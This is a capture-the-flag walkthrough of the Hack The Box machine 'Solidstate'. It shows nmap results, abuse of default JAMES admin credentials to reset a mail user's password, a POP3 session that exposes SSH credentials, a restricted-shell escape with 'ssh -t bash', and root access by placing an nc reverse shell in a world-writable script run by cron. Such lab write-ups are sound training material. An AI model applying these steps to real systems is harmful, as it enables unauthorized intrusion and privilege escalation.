HTB — Solidstate

Machine IP- 10.10.10.51

Nmap

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello 10.10.10.51 (10.10.14.7 [10.10.14.7]), 
|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods: 
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home — Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

After doing enumeration i found default creds of james server at exploit -db

Using them i moved in JAMES — ADMIN SERVER which was running at 4555

So i just tried to login at james admin server with the default creds

JAMES ADMIN SEVER

With the use of james admin server we can change the users password as we had changed the password of mindy

Here we had changed the password of MINDY , now let’s login to pop3 using mindy and the password we had changed from JAMES ADMIN SERVER

└──╼telnet 10.10.10.51 110
Trying 10.10.10.51…
Connected to 10.10.10.51.
Escape character is ‘^]’.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
USER mindy
+OK
PASS mindy
+OK Welcome mindy
help
-ERR
LIST
+OK 2 1945
1 1109
2 836
.
TOP 2 836
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
 by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
 for <mindy@localhost>;
 Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy
pass: P@55W0rd1!2@
Respectfully,
James

Yup here we got the password of mindy now let’s connect mindy with the password.

BINGO !! we got the user mindy user

Here we got user.txt

But the mindy user shell is not letting us leave the directory

mindy@solidstate:~$ cd bin
-rbash: cd: restricted

We can bypass it using ssh

ssh mindy@10.10.10.51 -t bash

Here we got our bash shell without any restrictions so let’s begin our post enumeration with linuxprivchecker.py

And found world writable files at /opt/tmp.py and it’s runs in every 5min so we can give our nc command and can get our root reverse shell

Successfully placed our reverse shell and now let’s wait for root to run it

BOOM ! got ROOT 🙌

………………………………..cowabunga……………………………………….